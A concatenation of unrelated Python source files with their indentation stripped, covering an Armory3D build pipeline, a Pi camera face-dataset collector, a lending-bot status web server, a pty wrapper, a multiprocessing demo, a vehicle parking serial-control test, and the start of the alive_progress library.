if arm.utils.get_legacy_shaders() or 'ios' in state.target:
if 'html5' in state.target or 'ios' in state.target:
pass
else:
cmd.append('--shaderversion')
cmd.append('110')
elif 'android' in state.target or 'html5' in state.target:
cmd.append('--shaderversion')
cmd.append('300')
else:
cmd.append('--shaderversion')
cmd.append('330')
if '_VR' in wrd.world_defs:
cmd.append('--vr')
cmd.append('webvr')
if arm.utils.get_rp().rp_renderer == 'Raytracer':
cmd.append('--raytrace')
cmd.append('dxr')
dxc_path = fp + '/HlslShaders/dxc.exe'
subprocess.Popen([dxc_path, '-Zpr', '-Fo', fp + '/Bundled/raytrace.cso', '-T', 'lib_6_3', fp + '/HlslShaders/raytrace.hlsl']).wait()
if arm.utils.get_khamake_threads() > 1:
cmd.append('--parallelAssetConversion')
cmd.append(str(arm.utils.get_khamake_threads()))
compilation_server = False
cmd.append('--to')
if (kha_target_name == 'krom' and not state.is_publish) or (kha_target_name == 'html5' and not state.is_publish):
cmd.append(arm.utils.build_dir() + '/debug')
# Start compilation server
if kha_target_name == 'krom' and arm.utils.get_compilation_server() and not assets_only and wrd.arm_cache_build:
compilation_server = True
arm.lib.server.run_haxe(arm.utils.get_haxe_path())
else:
cmd.append(arm.utils.build_dir())
if not wrd.arm_verbose_output:
cmd.append("--quiet")
else:
print("Using project from " + arm.utils.get_fp())
print("Running: ", cmd)
#Project needs to be compiled at least once
#before compilation server can work
if not os.path.exists(arm.utils.build_dir() + '/debug/krom/krom.js') and not state.is_publish:
state.proc_build = run_proc(cmd, build_done)
else:
if assets_only or compilation_server:
cmd.append('--nohaxe')
cmd.append('--noproject')
state.proc_build = run_proc(cmd, assets_done if compilation_server else build_done)
def build(target, is_play=False, is_publish=False, is_export=False):
global profile_time
profile_time = time.time()
state.target = target
state.is_play = is_play
state.is_publish = is_publish
state.is_export = is_export
# Save blend
if arm.utils.get_save_on_build():
bpy.ops.wm.save_mainfile()
log.clear(clear_warnings=True)
# Set camera in active scene
active_scene = arm.utils.get_active_scene()
if active_scene.camera == None:
for o in active_scene.objects:
if o.type == 'CAMERA':
active_scene.camera = o
break
# Get paths
sdk_path = arm.utils.get_sdk_path()
raw_shaders_path = sdk_path + '/armory/Shaders/'
# Set dir
fp = arm.utils.get_fp()
os.chdir(fp)
# Create directories
wrd = bpy.data.worlds['Arm']
sources_path = 'Sources/' + arm.utils.safestr(wrd.arm_project_package)
if not os.path.exists(sources_path):
os.makedirs(sources_path)
# Save external scripts edited inside Blender
write_texts = False
for text in bpy.data.texts:
if text.filepath != '' and text.is_dirty:
write_texts = True
break
if write_texts:
area = bpy.context.area
old_type = area.type
area.type = 'TEXT_EDITOR'
for text in bpy.data.texts:
if text.filepath != '' and text.is_dirty and os.path.isfile(text.filepath):
area.spaces[0].text = text
bpy.ops.text.save()
area.type = old_type
# Save internal Haxe scripts
for text in bpy.data.texts:
if text.filepath == '' and text.name[-3:] == '.hx':
with open('Sources/' + arm.utils.safestr(wrd.arm_project_package) + '/' + text.name, 'w') as f:
f.write(text.as_string())
# Export data
export_data(fp, sdk_path)
if state.target == 'html5':
w, h = arm.utils.get_render_resolution(arm.utils.get_active_scene())
write_data.write_indexhtml(w, h, is_publish)
# Bundle files from include dir
if os.path.isdir('include'):
dest = '/html5/' if is_publish else '/debug/html5/'
for fn in glob.iglob(os.path.join('include', '**'), recursive=False):
shutil.copy(fn, arm.utils.build_dir() + dest + os.path.basename(fn))
def play_done():
state.proc_play = None
state.redraw_ui = True
log.clear()
def assets_done():
if state.proc_build == None:
return
result = state.proc_build.poll()
if result == 0:
# Connect to the compilation server
os.chdir(arm.utils.build_dir() + '/debug/')
cmd = [arm.utils.get_haxe_path(), '--connect', '6000', 'project-krom.hxml']
state.proc_build = run_proc(cmd, compilation_server_done)
else:
state.proc_build = None
state.redraw_ui = True
log.error('Build failed, check console')
def compilation_server_done():
if state.proc_build == None:
return
result = state.proc_build.poll()
if result == 0:
build_done()
else:
state.proc_build = None
state.redraw_ui = True
log.error('Build failed, check console')
def build_done():
print('Finished in ' + str(time.time() - profile_time))
if log.num_warnings > 0:
log.print_warn(f'{log.num_warnings} warnings occurred during compilation')
if state.proc_build is None:
return
result = state.proc_build.poll()
state.proc_build = None
state.redraw_ui = True
if result == 0:
bpy.data.worlds['Arm'].arm_recompile = False
build_success()
else:
log.error('Build failed, check console')
def patch():
if state.proc_build != None:
return
assets.invalidate_enabled = False
fp = arm.utils.get_fp()
os.chdir(fp)
asset_path = arm.utils.get_fp_build() + '/compiled/Assets/' + arm.utils.safestr(bpy.context.scene.name) + '.arm'
ArmoryExporter.export_scene(bpy.context, asset_path, scene=bpy.context.scene)
if not os.path.isdir(arm.utils.build_dir() + '/compiled/Shaders/std'):
raw_shaders_path = arm.utils.get_sdk_path() + '/armory/Shaders/'
shutil.copytree(raw_shaders_path + 'std', arm.utils.build_dir() + '/compiled/Shaders/std')
node_path = arm.utils.get_node_path()
khamake_path = arm.utils.get_khamake_path()
cmd = [node_path, khamake_path, 'krom']
cmd.extend(('--shaderversion', '330', '--parallelAssetConversion', '4',
'--to', arm.utils.build_dir() + '/debug', '--nohaxe', '--noproject'))
assets.invalidate_enabled = True
state.proc_build = run_proc(cmd, patch_done)
def patch_done():
js = 'iron.Scene.patch();'
write_patch(js)
state.proc_build = None
patch_id = 0
def write_patch(js):
global patch_id
with open(arm.utils.get_fp_build() + '/debug/krom/krom.patch', 'w') as f:
patch_id += 1
f.write(str(patch_id) + '\n')
f.write(js)
def runtime_to_target():
wrd = bpy.data.worlds['Arm']
if wrd.arm_runtime == 'Krom':
return 'krom'
else:
return 'html5'
def get_khajs_path(target):
if target == 'krom':
return arm.utils.build_dir() + '/debug/krom/krom.js'
else: # Browser
return arm.utils.build_dir() + '/debug/html5/kha.js'
def play():
global scripts_mtime
wrd = bpy.data.worlds['Arm']
build(target=runtime_to_target(), is_play=True)
khajs_path = get_khajs_path(state.target)
if not wrd.arm_cache_build or \
not os.path.isfile(khajs_path) or \
assets.khafile_defs_last != assets.khafile_defs or \
state.last_target != state.target:
wrd.arm_recompile = True
state.last_target = state.target
# Trait sources modified
state.mod_scripts = []
script_path = arm.utils.get_fp() + '/Sources/' + arm.utils.safestr(wrd.arm_project_package)
if os.path.isdir(script_path):
new_mtime = scripts_mtime
for fn in glob.iglob(os.path.join(script_path, '**', '*.hx'), recursive=True):
mtime = os.path.getmtime(fn)
if scripts_mtime < mtime:
arm.utils.fetch_script_props(fn) # Trait props
fn = fn.split('Sources/')[1]
fn = fn[:-3] #.hx
fn = fn.replace('/', '.')
state.mod_scripts.append(fn)
wrd.arm_recompile = True
if new_mtime < mtime:
new_mtime = mtime
scripts_mtime = new_mtime
if len(state.mod_scripts) > 0: # Trait props
arm.utils.fetch_trait_props()
compile(assets_only=(not wrd.arm_recompile))
def build_success():
log.clear()
wrd = bpy.data.worlds['Arm']
if state.is_play:
if wrd.arm_runtime == 'Browser':
# Start server
os.chdir(arm.utils.get_fp())
t = threading.Thread(name='localserver', target=arm.lib.server.run_tcp)
t.daemon = True
t.start()
html5_app_path = 'http://localhost:8040/' + arm.utils.build_dir() + '/debug/html5'
webbrowser.open(html5_app_path)
elif wrd.arm_runtime == 'Krom':
if wrd.arm_live_patch:
open(arm.utils.get_fp_build() + '/debug/krom/krom.patch', 'w').close()
krom_location, krom_path = arm.utils.krom_paths()
os.chdir(krom_location)
cmd = [krom_path, arm.utils.get_fp_build() + '/debug/krom', arm.utils.get_fp_build() + '/debug/krom-resources']
if arm.utils.get_os() == 'win':
cmd.append('--consolepid')
cmd.append(str(os.getpid()))
if wrd.arm_audio == 'Disabled':
cmd.append('--nosound')
state.proc_play = run_proc(cmd, play_done)
elif state.is_publish:
sdk_path = arm.utils.get_sdk_path()
target_name = arm.utils.get_kha_target(state.target)
files_path = os.path.join(arm.utils.get_fp_build(), target_name)
if (target_name == 'html5' or target_name == 'krom') and wrd.arm_minify_js:
# Minify JS
minifier_path = sdk_path + '/lib/armory_tools/uglifyjs/bin/uglifyjs'
if target_name == 'html5':
jsfile = files_path + '/kha.js'
else:
jsfile = files_path + '/krom.js'
args = [arm.utils.get_node_path(), minifier_path, jsfile, '-o', jsfile]
proc = subprocess.Popen(args)
proc.wait()
if target_name == 'krom':
# Copy Krom binaries
if state.target == 'krom-windows':
gapi = state.export_gapi
ext = '' if gapi == 'direct3d11' else '_' + gapi
krom_location = sdk_path + '/Krom/Krom' + ext + '.exe'
shutil.copy(krom_location, files_path + '/Krom.exe')
krom_exe = arm.utils.safestr(wrd.arm_project_name) + '.exe'
os.rename(files_path + '/Krom.exe', files_path + '/' + krom_exe)
elif state.target == 'krom-linux':
krom_location = sdk_path + '/Krom/Krom'
shutil.copy(krom_location, files_path)
krom_exe = arm.utils.safestr(wrd.arm_project_name)
os.rename(files_path + '/Krom', files_path + '/' + krom_exe)
krom_exe = './' + krom_exe
else:
krom_location = sdk_path + '/Krom/Krom.app'
shutil.copytree(krom_location, files_path + '/Krom.app')
game_files = os.listdir(files_path)
for f in game_files:
f = files_path + '/' + f
if os.path.isfile(f):
shutil.move(f, files_path + '/Krom.app/Contents/MacOS')
krom_exe = arm.utils.safestr(wrd.arm_project_name) + '.app'
os.rename(files_path + '/Krom.app', files_path + '/' + krom_exe)
# Rename
ext = state.target.split('-')[-1] # krom-windows
new_files_path = files_path + '-' + ext
os.rename(files_path, new_files_path)
files_path = new_files_path
if target_name == 'html5':
project_path = files_path
print('Exported HTML5 package to ' + project_path)
elif target_name.startswith('ios') or target_name.startswith('osx'): # TODO: to macos
project_path = files_path + '-build'
print('Exported XCode project to ' + project_path)
elif target_name.startswith('windows'):
project_path = files_path + '-build'
print('Exported Visual Studio 2017 project to ' + project_path)
elif target_name.startswith('android'):
project_path = os.path.join(files_path + '-build', arm.utils.safestr(wrd.arm_project_name))
print('Exported Android Studio project to ' + project_path)
elif target_name.startswith('krom'):
project_path = files_path
print('Exported Krom package to ' + project_path)
else:
project_path = files_path + '-build'
print('Exported makefiles to ' + project_path)
if arm.utils.get_arm_preferences().open_build_directory:
arm.utils.open_folder(project_path)
# Android build APK
if (arm.utils.get_project_android_build_apk()) and (len(arm.utils.get_android_sdk_root_path()) > 0):
print("\nBuilding APK")
# Check settings
path_sdk = arm.utils.get_android_sdk_root_path()
if len(path_sdk) > 0:
# Check Environment Variables - ANDROID_SDK_ROOT
if os.getenv('ANDROID_SDK_ROOT') == None:
# Set value from settings
os.environ['ANDROID_SDK_ROOT'] = path_sdk
else:
project_path = ''
# Build start
if len(project_path) > 0:
os.chdir(project_path) # set work folder
if arm.utils.get_os_is_windows():
state.proc_publish_build = run_proc(os.path.join(project_path, "gradlew.bat assembleDebug"), done_gradlew_build)
else:
cmd = shlex.split(os.path.join(project_path, "gradlew assembleDebug"))
state.proc_publish_build = run_proc(cmd, done_gradlew_build)
else:
print('\nBuilding APK Warning: ANDROID_SDK_ROOT is not specified in environment variables and "Android SDK Path" setting is not specified in preferences: \n- If you specify an environment variable ANDROID_SDK_ROOT, then you need to restart Blender;\n- If you specify the setting "Android SDK Path" in the preferences, then repeat operation "Publish"')
def done_gradlew_build():
if state.proc_publish_build == None:
return
result = state.proc_publish_build.poll()
if result == 0:
state.proc_publish_build = None
wrd = bpy.data.worlds['Arm']
path_apk = os.path.join(arm.utils.get_fp_build(), arm.utils.get_kha_target(state.target))
path_apk = os.path.join(path_apk + '-build', arm.utils.safestr(wrd.arm_project_name), "app", "build", "outputs", "apk", "debug")
print("\nBuild APK to " + path_apk)
# Open directory with APK
if arm.utils.get_android_open_build_apk_directory():
arm.utils.open_folder(path_apk)
# Running emulator
if wrd.arm_project_android_run_avd:
run_android_emulators(arm.utils.get_android_emulator_name())
state.redraw_ui = True
else:
state.proc_publish_build = None
state.redraw_ui = True
os.environ['ANDROID_SDK_ROOT'] = ''
log.error('Building the APK failed, check console')
def run_android_emulators(avd_name):
if len(avd_name.strip()) == 0:
return
print('\nRunning Emulator "'+ avd_name +'"')
path_file = arm.utils.get_android_emulator_file()
if len(path_file) > 0:
if arm.utils.get_os_is_windows():
run_proc(path_file + " -avd "+ avd_name, None)
else:
cmd = shlex.split(path_file + " -avd "+ avd_name)
run_proc(cmd, None)
else:
print('Update List Emulators Warning: File "'+ path_file +'" not found. Check that the variable ANDROID_SDK_ROOT is correct in environment variables or in "Android SDK Path" setting: \n- If you specify an environment variable ANDROID_SDK_ROOT, then you need to restart Blender;\n- If you specify the setting "Android SDK Path", then repeat operation "Publish"')
def clean():
os.chdir(arm.utils.get_fp())
wrd = bpy.data.worlds['Arm']
# Remove build and compiled data
try:
if os.path.isdir(arm.utils.build_dir()):
shutil.rmtree(arm.utils.build_dir(), onerror=remove_readonly)
if os.path.isdir(arm.utils.get_fp() + '/build'): # Kode Studio build dir
shutil.rmtree(arm.utils.get_fp() + '/build', onerror=remove_readonly)
except:
print('Armory Warning: Some files in the build folder are locked')
# Remove compiled nodes
pkg_dir = arm.utils.safestr(wrd.arm_project_package).replace('.', '/')
nodes_path = 'Sources/' + pkg_dir + '/node/'
if os.path.isdir(nodes_path):
shutil.rmtree(nodes_path, onerror=remove_readonly)
# Remove khafile/Main.hx
if os.path.isfile('khafile.js'):
os.remove('khafile.js')
if os.path.isfile('Sources/Main.hx'):
os.remove('Sources/Main.hx')
# Remove Sources/ dir if empty
if os.path.exists('Sources/' + pkg_dir) and os.listdir('Sources/' + pkg_dir) == []:
shutil.rmtree('Sources/' + pkg_dir, onerror=remove_readonly)
if os.path.exists('Sources') and os.listdir('Sources') == []:
shutil.rmtree('Sources/', onerror=remove_readonly)
# To recache signatures for batched materials
for mat in bpy.data.materials:
mat.signature = ''
mat.arm_cached = False
# Restart compilation server
if arm.utils.get_compilation_server():
arm.lib.server.kill_haxe()
print('Project cleaned')
|
datasets.py
|
import cv2
import numpy as np
import os
from picamera.array import PiRGBArray
from picamera import PiCamera
from threading import Thread
import time
FPS = 40
ROTATION = 0
HFLIP = False
VFLIP = True
RESOLUTION = (640, 480)
class PiStream:
''' Pi Camera Setup '''
def __init__(self, resolution = RESOLUTION, framerate = FPS, rotation = ROTATION, hflip = HFLIP, vflip = VFLIP):
''' Class initialization '''
self.camera = PiCamera()
self.camera.resolution = resolution
self.camera.framerate = framerate
self.camera.hflip = hflip
self.camera.vflip = vflip
self.rawCapture = PiRGBArray(self.camera, size = resolution)
self.stream = self.camera.capture_continuous(self.rawCapture, format = "bgr", use_video_port = True)
self.frame = None
self.stopped = False
def start(self):
''' Starting thread to read frames '''
t = Thread(target = self.update)
t.daemon = True
t.start()
return self
def update(self):
''' Updating frames '''
for frame in self.stream:
self.frame = frame.array
self.rawCapture.truncate(0)
if self.stopped:
self.stream.close()
self.rawCapture.close()
self.camera.close()
return
def read(self):
''' Reading most recent frame '''
return self.frame
def stop(self):
''' Stopping thread '''
self.stopped = True
def check_path(path):
dir = os.path.dirname(path)
if not os.path.exists(dir):
os.makedirs(dir)
cap = PiStream().start()
cap.camera.rotation = ROTATION
cap.camera.hflip = HFLIP
cap.camera.vflip = VFLIP
time.sleep(2)
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
face_id = 1
count = 0
check_path("dataset/")
while True:
img = cap.read()
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.4, 5)
for (x,y,w,h) in faces:
cv2.rectangle(img, (x,y), (x+w,y+h), (255,0,0), 2)
count += 1
cv2.imwrite("dataset/User." + str(face_id) + "." + str(count) + ".jpg",gray[y:y+h,x:x+w])
cv2.imshow("Frame", img)
key = cv2.waitKey(20) & 0xFF
if key == 27 or count == 400:
break
cap.stop()
cv2.destroyAllWindows()
|
WebServer.py
|
# coding=utf-8
import threading
server = None
web_server_ip = "0.0.0.0"
web_server_port = "8000"
web_server_template = "www"
def initialize_web_server(config):
'''
Setup the web server, retrieving the configuration parameters
and starting the web server thread
'''
global web_server_ip, web_server_port, web_server_template
# Check for custom web server address
compositeWebServerAddress = config.get('BOT', 'customWebServerAddress', '0.0.0.0').split(":")
# associate web server ip address
web_server_ip = compositeWebServerAddress[0]
# check for IP:PORT legacy format
if (len(compositeWebServerAddress) > 1):
# associate web server port
web_server_port = compositeWebServerAddress[1]
else:
# Check for custom web server port
web_server_port = config.get('BOT', 'customWebServerPort', '8000')
# Check for custom web server template
web_server_template = config.get('BOT', 'customWebServerTemplate', 'www')
print('Starting WebServer at {0} on port {1} with template {2}'
.format(web_server_ip, web_server_port, web_server_template))
thread = threading.Thread(target=start_web_server)
thread.deamon = True
thread.start()
def start_web_server():
'''
Start the web server
'''
import SimpleHTTPServer
import SocketServer
import socket
try:
port = int(web_server_port)
host = web_server_ip
# Do not attempt to fix code warnings in the below class, it is perfect.
class QuietHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
# quiet server logs
def log_message(self, format, *args):
return
# serve from www folder under current working dir
def translate_path(self, path):
return SimpleHTTPServer.SimpleHTTPRequestHandler.translate_path(self, '/' + web_server_template + path)
global server
SocketServer.TCPServer.allow_reuse_address = True
server = SocketServer.TCPServer((host, port), QuietHandler)
if host == "0.0.0.0":
# Get all addresses that we could listen on the port specified
addresses = [i[4][0] for i in socket.getaddrinfo(socket.gethostname().split('.')[0], port)]
addresses = [i for i in addresses if ':' not in i] # Filter out all IPv6 addresses
addresses.append('127.0.0.1') # getaddrinfo doesn't always get localhost
hosts = list(set(addresses)) # Make list unique
else:
hosts = [host]
serving_msg = "http://{0}:{1}/lendingbot.html".format(hosts[0], port)
for host in hosts[1:]:
serving_msg += ", http://{0}:{1}/lendingbot.html".format(host, port)
print('Started WebServer, lendingbot status available at {0}'.format(serving_msg))
server.serve_forever()
except Exception as ex:
print('Failed to start WebServer: {0}'.format(ex))
def stop_web_server():
'''
Stop the web server
'''
try:
print("Stopping WebServer")
threading.Thread(target=server.shutdown).start()
except Exception as ex:
print("Failed to stop WebServer: {0}".format(ex))
|
cppty.py
|
"""Cross-platform version of pty"""
import platform
from threading import Thread
if platform.system().lower().startswith('win'):
# windows
from winpty import PtyProcess
import os
import sys
import re
import msvcrt
# TODO CRTL+C
def spawn(argv, win_repeat_argv0=False, **kwargs):
# TODO: For whatever reason, Docker needs their name as padding in the arguments again.
if win_repeat_argv0:
argv = [argv[0]] + argv
term_size = os.get_terminal_size()
process = PtyProcess.spawn(argv, dimensions=(term_size[1], term_size[0]-2))
# TODO: Is this even thread-safe?
# TODO: "pressing up" (...in bash doesn't do what it's supposed to)
def read():
try:
while True:
if msvcrt.kbhit():
process.write(msvcrt.getwch())
except EOFError:
pass
## WRITE
t = Thread(target=read)
t.daemon = True # thread dies with the program
t.start()
## READ
try:
while True:
# Remove some unprintable escape sequences when using winpty
# TODO: FAR from perfect yet (what if sequence is on "boundary"?).
# Source: https://stackoverflow.com/a/14693789
ansi_escape = re.compile(r'\x1B\[\?25[hl]*[ -/]*[@-~]')
# TODO: Little bit of a buffering issue here.
sys.stdout.write(ansi_escape.sub('', process.read(4096)))
except EOFError:
pass
process.close()
return process.exitstatus()
else:
# linux and mac
import riptide.lib.cross_platform.stdlib_pty_fork as pty
def spawn(argv, **kwargs):
return pty.spawn(argv)
|
multiprocessing_demo.py
|
# !/usr/bin/env python
# -- coding: utf-8 --
# @Author zengxiaohui
# Datatime:7/30/2021 10:40 AM
# @File:multiprocessing_demo
import multiprocessing
import time
from multiprocessing.managers import BaseManager
class CA(object):
def __init__(self):
self.name ="A"
self.valuey = "a_value"
def run(self):
self.valuey = "2_value"
def prints(self):
return self.valuey
def func1(sleep,sharearg,shareca,q):
time.sleep(sleep)
ct = time.time()
print("func1结束{}.{}".format(time.strftime("%Y-%m-%d,%H:%M:%S", time.localtime(ct)), (ct - int(ct)) * 1000))
# sharearg = multiprocessing.Manager().Value("s","sharearg")
# sharearg.value
sharearg.value = sharearg.value + "func1"
shareca.value.run()
q.put([{"name": "func1","sharearg":sharearg.value,"shareca":shareca.value.prints()}])
def func2(sleep,sharearg,shareca,q):
time.sleep(sleep)
ct = time.time()
print("func2结束{}.{}".format(time.strftime("%Y-%m-%d,%H:%M:%S", time.localtime(ct)), (ct - int(ct)) * 1000))
sharearg.value = sharearg.value + "func2"
q.put([{"name": "func2","sharearg":sharearg.value}])
def func3(sleep,sharearg,shareca):
time.sleep(sleep)
ct = time.time()
print("func3结束{}.{}".format(time.strftime("%Y-%m-%d,%H:%M:%S", time.localtime(ct)), (ct - int(ct)) * 1000))
sharearg.value = sharearg.value + "func3"
return [{"name": "func3","sharearg":sharearg.value}]
if __name__ == '__main__':
start = time.time()
results = []
q = multiprocessing.Queue() # 获取返回结果的队列
manager = multiprocessing.Manager()
sharearg = manager.Value("s","sharearg")
ca = CA()
shareca = manager.Value(CA, ca) # 共享了类但是不会改变值
shareca.value.run()
print(shareca.value.valuey)
ct = time.time()
print("开始{}.{}".format(time.strftime("%Y-%m-%d,%H:%M:%S", time.localtime(ct)), (ct - int(ct)) * 1000))
thread_func1 = multiprocessing.Process(target=func1, args=(0.4,sharearg,shareca, q))
thread_func2 = multiprocessing.Process(target=func2, args=(0.2,sharearg,shareca, q))
# 启动线程
thread_func1.start()
thread_func2.start()
results.extend(func3(0.9,sharearg,shareca))
thread_func1.join()
thread_func2.join()
results.extend(q.get())
results.extend(q.get())
print('Main thread has ended!',time.time()-start,results)
|
parking_test.py
|
import serial
import time
import math
import threading # for test, main 코드에서는 멀티 프로세싱 사용하는 게 목표야.
# CONSTANTS for _read(), related with encoder
DISTANCE_PER_ROTATION = 54.02 * math.pi # Distance per Rotation [cm]
PULSE_PER_ROTATION = 100. # Pulse per Rotation
DISTANCE_PER_PULSE = DISTANCE_PER_ROTATION / PULSE_PER_ROTATION # Distance per Pulse
class PlatformSerial:
def __init__(self, platform_port):
self.platform = platform_port # e.g. /dev/ttyUSB0 on GNU/Linux or COM3 on Windows.
# 포트 오픈, 115200 사용. OS 내에서 시리얼 포트도 맞춰줄 것+
try:
self.ser = serial.Serial(self.platform, 115200) # Baud rate such as 9600 or 115200 etc.
except Exception as e:
print(e)
self.reading_data = bytearray([0 for i in range(14)])
# 쓰기 데이터 셋
self.writing_data = bytearray.fromhex("5354580000000000000001000D0A")
self.speed_for_write = 0
self.steer_for_write = 0
self.brake_for_write = 0
self.gear_for_write = 0 # 0: 전진, 1: 후진, 2: 중립
self.check = 0
self.present_time = 0
self.past_time = 0
self.parking_time1 = 0
self.parking_time2 = 0
self.ct1 = 0
self.ct2 = 0
self.ct3 = 0
self.ct4 = 0
self.ct5 = 0
self.ct6 = 0
self.ct7 = 0
self.ct8 = 0
self.psit = 1
self.ENC1 = 0
self.steer_platform = 0
self.speed_platform = 0
self.e1 = 0
self.e2 = 0
self.f = open("record_test_3.txt", 'w')
def _read(self): # read data from platform
reading_data = bytearray(self.ser.readline()) # byte array 로 읽어옴
self.reading_data = reading_data
try:
# data parsing, 패킷 설명은 책자 참조
ETX1 = reading_data[17]
AorM = reading_data[3]
ESTOP = reading_data[4]
GEAR = reading_data[5]
SPEED = reading_data[6] + reading_data[7] * 256
STEER = reading_data[8] + reading_data[9] * 256
# STEER 범위 조정
if STEER >= 32768: # 65536 / 2 = 32768
STEER = 65536 - STEER
else:
STEER = -STEER
BRAKE = reading_data[10]
time_encoder = time.time()
# ENC0, ENC_with_time, ENC2, ENC3
ENC = reading_data[11] + reading_data[12] * 256 + reading_data[13] * 65536 + reading_data[14] * 16777216
if ENC >= 2147483648:
ENC = ENC - 4294967296
ALIVE = reading_data[15] # 플랫폼 통신 주기 체크
try:
speed_from_encoder = (ENC - self.ENC1[0]) * DISTANCE_PER_PULSE / (
time_encoder - self.ENC1[1]) * 0.036
except Exception as e:
print(e)
pass
self.ENC1 = (ENC, time_encoder)
self.speed_platform = SPEED
self.steer_platform = STEER
except:
pass
def _write(self, speed_for_write=None, steer_for_write=None, brake_for_write=None, gear_for_write=None):
# write data to platform
if speed_for_write is not None:
self.speed_for_write = speed_for_write
if steer_for_write is not None:
self.steer_for_write = steer_for_write
if brake_for_write is not None:
self.brake_for_write = brake_for_write
if gear_for_write is not None:
self.gear_for_write = gear_for_write
try:
self.steer_for_write = int(self.steer_for_write * 1.015)
if self.steer_for_write < 0:
self.steer_for_write = self.steer_for_write + 65536
self.writing_data[3] = 1 # AorM
self.writing_data[4] = 0 # E stop
# gear 입력
self.writing_data[5] = self.gear_for_write # GEAR
# speed 입력
self.writing_data[6] = 0
self.writing_data[7] = self.speed_for_write
# steer 입력, 16진법 두 칸 전송
self.writing_data[8] = int(self.steer_for_write / 256)
self.writing_data[9] = self.steer_for_write % 256
# brake 입력
self.writing_data[10] = self.brake_for_write
# 받은 데이터와 똑같이 전송, 플랫폼 자체적으로 데이터 수신 간격을 알기 위함
self.writing_data[11] = self.reading_data[15]
self.writing_data[12] = self.reading_data[16]
self.writing_data[13] = self.reading_data[17]
self.ser.write(bytearray(self.writing_data)) # 플랫폼에 시리얼 데이터 패킷 전송
except Exception as e:
print(e)
print(' auto error')
self.ser.write(bytearray(self.writing_data))
pass
def get_data_real_time(self):
# _read() 를 이용해 플랫폼 데이터를 실시간으로 읽음
try:
while True:
self._read()
except KeyboardInterrupt: # ctrl+C 누르면 탈출 - 안 되는데?
pass
self.ser.close()
def test_write_to_platform(self):
self.speed_for_write = 0
self.steer_for_write = 0
self.brake_for_write = 0
self.gear_for_write = 0
if self.e1 == 0:
self.e1 = self.ENC1[0]
self.e2 = self.ENC1[0]
data = "%d " % (self.e2 - self.e1)
print(data)
if self.psit == 1:
self.speed_for_write = 36
if self.ct1 == 0:
self.ct1 = self.ENC1[0]
self.ct2 = self.ENC1[0]
if (self.ct2 - self.ct1) < 100:
self.steer_for_write = 0
self.f.write("\nstraight_1 ")
self.f.write(data)
elif 100 <= (self.ct2 - self.ct1) < 290: # 변경할 때 걸리는 엔코더 초과값 계산 및 보정 필요(593)
self.steer_for_write = 1970
self.f.write("\nturn right ")
self.f.write(data)
if (self.ct2 - self.ct1) >= 290:
self.steer_for_write = 1970
self.speed_for_write = 0
self.brake_for_write = 60
self.f.write("\nstop ")
self.f.write(data)
if self.speed_platform == 0:
self.steer_for_write = 0
self.psit = 2
elif self.psit == 2:
if self.ct3 == 0:
self.ct3 = self.ENC1[0]
self.ct4 = self.ENC1[0]
if (self.ct4 - self.ct3) < 120:
self.speed_for_write = 36
self.steer_for_write = 0
self.brake_for_write = 0
self.f.write("\nstraight_2 ")
self.f.write(data)
if (self.ct4 - self.ct3) >= 120:
self.steer_for_write = 0
self.brake_for_write = 60
self.speed_for_write = 0
self.f.write("\nstop ")
self.f.write(data)
if self.speed_platform == 0:
self.psit = 3
self.f.write("\nstop_ENC_record ")
self.f.write(data)
elif self.psit == 3:
self.speed_for_write = 0
self.steer_for_write = 0
if self.parking_time1 == 0:
self.parking_time1 = time.time()
self.parking_time2 = time.time()
self.f.write("\ntime stop ")
if (self.parking_time2 - self.parking_time1) > 10:
self.psit = 4
elif self.psit == 4:
self.gear_for_write = 2
self.speed_for_write = 36
self.brake_for_write = 0
if self.ct5 == 0:
self.ct5 = self.ENC1[0]
self.ct6 = self.ENC1[0]
if abs(self.ct6 - self.ct5) < 120:
self.speed_for_write = 36
self.steer_for_write = 0
self.brake_for_write = 0
self.f.write("\nback_straight ")
self.f.write(data)
if abs(self.ct6 - self.ct5) >= 120:
self.steer_for_write = 0
self.brake_for_write = 60
self.speed_for_write = 0
self.f.write("\nback_stop_1 ")
self.f.write(data)
if self.speed_platform == 0:
self.psit = 5
self.f.write("\nback_stop_ENC_record ")
self.f.write(data)
elif self.psit == 5:
self.gear_for_write = 2
self.speed_for_write = 36
self.brake_for_write = 0
if self.ct7 == 0:
self.ct7 = self.ENC1[0]
self.ct8 = self.ENC1[0]
if abs(self.ct8 - self.ct7) < 190:
self.speed_for_write = 36
self.steer_for_write = 1970
self.brake_for_write = 0
self.f.write("\nback_turn_right ")
self.f.write(data)
if abs(self.ct8 - self.ct7) >= 190:
self.steer_for_write = 1970
self.brake_for_write = 60
self.speed_for_write = 0
self.f.write("\nback_stop_2 ")
self.f.write(data)
if self.speed_platform == 0:
self.steer_for_write = 0
self.psit = 5
self.f.write("\nback_stop_ENC_record_2 ")
self.f.write(data)
elif self.psit == 6:
self.gear_for_write = 0
self.speed_for_write = 36
self.steer_for_write = 0
self.brake_for_write = 0
self.f.write("\nlast_straight ")
self.f.write(data)
def test_communication_main(self):
read_thread = threading.Thread(target=self._read())
write_thread = threading.Thread(target=self._write())
test_write_thread = threading.Thread(target=self.test_write_to_platform())
read_thread.start()
write_thread.start()
test_write_thread.start()
if __name__ == '__main__':
port = 'COM4'
# e.g. /dev/ttyUSB0 on GNU/Linux or COM3 on Windows.
platform = PlatformSerial(port)
while True:
platform.test_communication_main()
|
progress.py
|
# coding=utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
import math
import sys
import threading
import time
import warnings
from contextlib import contextmanager
from itertools import chain, islice, repeat
from .configuration import config_handler
from .logging_hook import install_logging_hook, uninstall_logging_hook
from .timing import gen_simple_exponential_smoothing_eta, to_elapsed_text, to_eta_text
from .utils import clear_traces, hide_cursor, render_title, sanitize_text_marking_wide_chars, \
show_cursor, terminal_columns
from ..animations.utils import spinner_player
@contextmanager
def alive_bar(total=None, title=None, calibrate=None, **options):
"""An alive progress bar to keep track of lengthy operations.
It has a spinner indicator, elapsed time, throughput and ETA.
When the operation finishes, a receipt is displayed with statistics.
If the code is executed in a headless environment, ie without a
connected tty, all features are disabled but the final receipt.
Another cool feature is that it tracks the actual count in regard of the
expected count. So it will look different if you send more (or less) than
expected.
Also, the bar installs a hook in the system print function that cleans
any garbage out of the terminal, allowing you to print() effortlessly
while using the bar.
Use it like this:
>>> from alive_progress import alive_bar
